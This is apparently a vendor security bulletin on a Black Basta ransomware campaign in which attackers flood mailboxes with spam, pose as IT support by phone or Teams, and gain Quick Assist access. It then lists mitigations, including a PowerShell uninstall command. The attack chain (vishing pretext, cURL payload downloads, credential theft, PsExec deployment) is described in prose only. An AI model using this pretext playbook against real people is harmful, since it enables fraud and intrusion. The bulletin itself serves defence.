Since December 16, 2024, Arctic Wolf has observed increased activity in a social engineering campaign associated with Black Basta ransomware. In this campaign, threat actors were observed using Microsoft Quick Assist and Teams to impersonate IT personnel and engage in malicious activities upon contacting victims. This is a continuation of the Black Basta campaign we reported on in a security bulletin sent in June 2024.
Black Basta is a ransomware group known for using double extortion tactics where sensitive information is exfiltrated and encrypted to pressure victims into paying. In some cases, people working with the group have harassed victims over the phone to try and pressure them into paying a ransom. Black Basta was first observed in December 2022.
Arctic Wolf has multiple detections in place for common activities observed in this and other related ransomware campaigns. To protect against this campaign, Arctic Wolf strongly recommends reviewing the campaign details and recommendations below.
Campaign Details
In some instances, Black Basta affiliates have been known to use Microsoft Teams to reach target users. Threat actors use Microsoft Teams to send messages and make calls, pretending to be IT or help desk staff.
In most instances, threat actors were observed sending a flood of email spam to victim mailboxes with emails from subscription services. They would then proceed to call victims in a voice phishing (vishing) attack posing as IT support, under the pretext of offering assistance in resolving the email flood issue.
Typically, threat actors in this campaign attempted to persuade victims to provide remote access to their workstations through Quick Assist (a remote access tool built into Microsoft Windows). This is accomplished by having the victim enter a security code and grant permissions for their device to be controlled remotely.
Once given remote access, threat actors were observed executing scripts with cURL commands to download batch or ZIP files and delivering malicious payloads such as EvilProxy, SystemBC, Qakbot, ScreenConnect, NetSupport Manager, and Cobalt Strike.
Having established persistence with these tools, threat actors were observed conducting domain enumeration, extracting credentials, moving laterally, and using PsExec to deploy Black Basta ransomware throughout victim environments.
Recommendations
Uninstall Quick Assist and/or Other RMM Tools if Not Utilized in Your Environment
If your organization does not utilize Quick Assist and/or any other remote support tools, Arctic Wolf strongly recommends disabling or uninstalling them. This prevents external threat actors from exploiting these tools to gain unauthorized access to your devices.
- Disabling Quick Assist
- To disable Quick Assist, block traffic to the https://remoteassistance.support.services.microsoft.com endpoint. This is the primary endpoint used by Quick Assist to establish a session, and once blocked, Quick Assist can’t be used to get help or help someone.
- Uninstalling Quick Assist
- Uninstall via powershell – Run the following PowerShell command as Administrator:
- Get-AppxPackage -Name MicrosoftCorporationII.QuickAssist | Remove-AppxPackage -AllUsers
- Uninstall via Windows Settings
- Navigate to Settings > Apps > Installed apps > Quick Assist > select the ellipsis (…), then select Uninstall.
- Uninstall via powershell – Run the following PowerShell command as Administrator:
Additionally, consider implementing policies to block the installation and use of Quick Assist and other RMM tools unless they have been explicitly approved for use within your environment. This approach helps ensure that only vetted and secure tools are in operation, further safeguarding your systems.
Install Arctic Wolf Agent & Sysmon
- Arctic Wolf has implemented MDR detections for post-compromise threat activity associated with this campaign on endpoint devices.
- Arctic Wolf Agent and Sysmon give Arctic Wolf visibility into network and endpoint events needed to identify Tools, Techniques, and Tactics involved in this campaign.
- For instructions on how to install Arctic Wolf Agent, see the below install guides:
- If you have a supported EDR solution deployed in your environment, please configure it for monitoring with Arctic Wolf.
Note: Arctic Wolf recommends following change management best practices for deploying Agent and Sysmon, including testing changes in a testing environment before deploying to production.
Implement Comprehensive Security Awareness Training
Black Basta affiliates have successfully socially engineered victims through calls and emails during this ongoing campaign. Arctic Wolf strongly recommends implementing comprehensive security awareness training campaigns. These initiatives are designed to equip users with the skills needed to quickly identify and report suspicious activities, including tech support scams observed in this campaign
Arctic Wolf has several vishing modules within our Managed Security Awareness (MSA) product that will help users identify the suspicious activity outlined in this bulletin.
Microsoft Teams Attack Vector Safeguards
Microsoft has provided the following mitigations to protect against attacks leveraging Microsoft Teams:
- Educate Microsoft Teams users to check for the ‘External’ tag on communications from external sources, exercise caution in sharing information, and avoid sharing account details or approving sign-in requests via chat.
- Apply Microsoft’s security best practices for Microsoft Teams.
